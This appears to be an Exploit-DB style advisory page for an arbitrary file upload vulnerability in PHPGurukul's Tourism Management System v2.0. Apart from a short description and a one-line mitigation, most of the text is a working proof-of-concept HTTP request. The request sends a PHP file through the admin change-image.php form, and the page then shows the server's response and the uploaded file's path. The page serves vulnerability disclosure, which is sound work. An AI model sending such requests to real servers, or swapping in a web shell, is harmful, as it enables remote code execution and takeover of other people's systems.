Tourism Management System v2.0 - Arbitrary File Upload

vendor:

Tourism Management System

by:

SoSPiro

6.1

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: Tourism Management System

Affected Version From: 2

Affected Version To: 2

Patch Exists: NO

Related CWE:

CPE: a:phpgurukul:tourism_management_system:2.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 Pro

2024

Tourism Management System v2.0 – Arbitrary File Upload

Tourism Management System v2.0 is vulnerable to arbitrary file upload due to insufficient input sanitization. An attacker can exploit this vulnerability to upload malicious files to the server.

Mitigation:

To mitigate this vulnerability, ensure that user inputs are properly validated and sanitized to prevent unauthorized file uploads.

Source

Exploit-DB raw data:

# Exploit Title: Tourism Management System v2.0 - Arbitrary File Upload
# Google Dork: N/A
# Exploit Author: SoSPiro
# Date: 2024-02-18
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/tourism-management-system-free-download/
# Version: 2.0
# Tested on: Windows 10 Pro
# Impact: Allows admin to upload all files to the web server
# CVE : N/A


# Exploit Description:
The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input.

# PoC request


POST /zer/tms/admin/change-image.php?imgid=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------390927495111779706051786831201
Content-Length: 361
Origin: http://localhost
Connection: close
Referer: http://localhost/zer/tms/admin/change-image.php?imgid=1
Cookie: PHPSESSID=eqms3ipedmm41hqa1djnu1euhv
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
X-PwnFox-Color: red

-----------------------------390927495111779706051786831201
Content-Disposition: form-data; name="packageimage"; filename="phpinfo.php"
Content-Type: text/plain

<?php phpinfo();?>
-----------------------------390927495111779706051786831201
Content-Disposition: form-data; name="submit"


-----------------------------390927495111779706051786831201--




===========================================================================================

- Response -

HTTP/1.1 200 OK
Date: Sun, 18 Feb 2024 04:33:37 GMT
Server: Apache/2.4.54 (Win64) PHP/8.1.13 mod_fcgid/2.3.10-dev
X-Powered-By: PHP/8.1.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8146

============================================================================================

- File location -

http://localhost/zer/tms/admin/pacakgeimages/phpinfo.php